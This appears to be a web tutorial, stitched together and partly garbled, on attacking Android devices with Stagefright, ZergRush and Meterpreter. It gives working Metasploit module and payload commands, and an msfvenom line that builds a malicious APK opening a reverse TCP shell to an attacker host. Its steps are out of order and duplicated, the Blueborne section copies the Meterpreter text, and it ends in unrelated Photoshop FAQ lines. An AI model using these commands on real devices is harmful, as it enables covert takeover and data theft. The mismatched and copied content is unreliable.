STAGEFRIGHT ATTACK
This attack on the Android operating system was discovered by an engineer named Joshua Drake from Zimperium company. The name is coined from one of the most important libraries in the Android operating system, the libstagefright. The stagefright library is responsible for unpacking multimedia messages in the Android system. It holds the functions necessary for opening multimedia messages on some of the default media applications that may come pre-installed on a purchase of an Android device like google hangout, MMS, text message app thereby making this attack a very devastating and slightly unpreventable one without taking the necessary steps. A vulnerability was found in the stagefright library that affected many of the android versions dating back to the Android 2.2 up until Android 4.0. This vulnerability in the Android operating system was so devastating as the flaw in the library made it very possible for an attacker to gain root privilege on your device just by tricking you to click a button, watch a video or point to a particular URL. It also made it possible for attackers to perform integer overflow on your devices every time you tried to watch a video.
IMPLEMENTATION
We will be using the Metasploit library to carry out root privilege escalation attacks integer that exploits the vulnerability in the stage fright library otherwise known as CVE-2015-1538 which could give the attacker access to the victim’s device microphone and also give attacker root privileges of the machine. After the target machine (android emulator) connects to the SRVHOST, we gain access to all the files present on the target machine and can delete or modify the files.
Stagefright Attack
STEPS TO IMPLEMENT
Enter exploit in the terminal.
“use exploit/android/browser/stagefright_mp4 _tx3g_64bit” This command tells Metasploit the type of attack to be carried out on the target machine.
linux/armle/meterpreter/reverse_tcp to listen to the reverse TCP, we set the payload
“Set SRVHOST -MachineIpAddress”
The SRVHOST is set to be the machine’s Ip address which can be found out by running ifconfig on Kali Linux or Ipconfig on a windows machine. So every time the target device points to the IP. There’s a reverse TCP connection.
This is the port the target machine is expected to connect through. This value can be set to any value
This just tells Metasploit to explicitly write out all the errors and query results in ways that could be understood by any human.
After all variables have been set. You start the connection by entering “exploit -j” to listen for all jobs and services that try to connect to your new Host.
ZergRush Attack
This exploit attacks the vulnerability of the Android system. Zergrush is a kind of privilege escalation attack in older android versions like Android 2.2 and 2.3. The vulnerability in the system library allows services running with root privileges to execute malicious code. This allows remote attackers to construct exploit code that passes invalid number of arguments to system calls triggering a stack-based buffer overflow. This results in device reboot and grants root access to the attacker
IMPEMENTATION
ZergRush exploit was identified in Android version 2.2, so we have used a virtual Android emulator (Froyo 2.2) for demonstration. Also, Android Debugger Bridge (ADB) tool has been used to copy and run exploit code on the target device. The virtual Android device needs to setup in developer mode to setup a ADB-Device communication channel.
Zergrush Implementation
STEP 1
Connect target device to Android Debugging Bridge (ADB) toolkit and copy the exploit binary (zergRush) [29] in local file system (/data/local)
step 3
Check for message “Killing ADB and restarting as root” on the ADB shell. Please refer screenshot.
step 2
Provide executable permissions to the exploit code
step 4
Device reboots and grants root access.
Zergrush Implementation
STEP 1
Connect target device to Android Debugging Bridge (ADB) toolkit and copy the exploit binary (zergRush) [29] in local file system (/data/local)
step 2
Provide executable permissions to the exploit code
step 3
Check for message “Killing ADB and restarting as root” on the ADB shell. Please refer screenshot.
step 4
Device reboots and grants root access.
Meterpreter
This is a type of android attack which gains full access of the android device once payload is installed on the target android device. To implement this attack, attacker needs to first create a malicious application which consists of the payload. The payload creates a reverse tcp connection once application is installed on the target device.
To create the application, attacker uses msfvenom which is a tool for creating the payload. This tool can be accessed using Metasploit console. Once the application is installed, it creates a reverse connection with using reverse_tcp. After the connection is successfully established, attacker can gain access to the android device and extract important information from it, without letting the user know that an attack has been initiated on his/her device.
The main pre-requisite for this attack is that the install application from untrusted sources must be enabled, without this the malicious application cannot be installed on the device.
Meterpreter Implementation
Step 1
Install the msfvenom to use the meterpreter.
Step 3
Establish the reverse TCP connection using the command below with the android device. msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.162 > android.apk
Step 2
Install the application in our emulator (Android Studio).
Step 4
Establish the session
Blueborne Attack
This is a type of android attack which gains full access of the android device once payload is installed on the target android device. To implement this attack, attacker needs to first create a malicious application which consists of the payload. The payload creates a reverse tcp connection once application is installed on the target device.
To create the application, attacker uses msfvenom which is a tool for creating the payload. This tool can be accessed using Metasploit console. Once the application is installed, it creates a reverse connection with using reverse_tcp. After the connection is successfully established, attacker can gain access to the android device and extract important information from it, without letting the user know that an attack has been initiated on his/her device.
The main pre-requisite for this attack is that the install application from untrusted sources must be enabled, without this the malicious application cannot be installed on the device.
FAQ
Install the msfvenom to use the meterpreter.
STEP 2
What do I need to open the files ?
Click on the mask and click “B” for brush tool.
You will need Photoshop preferably version CS6 and newer.
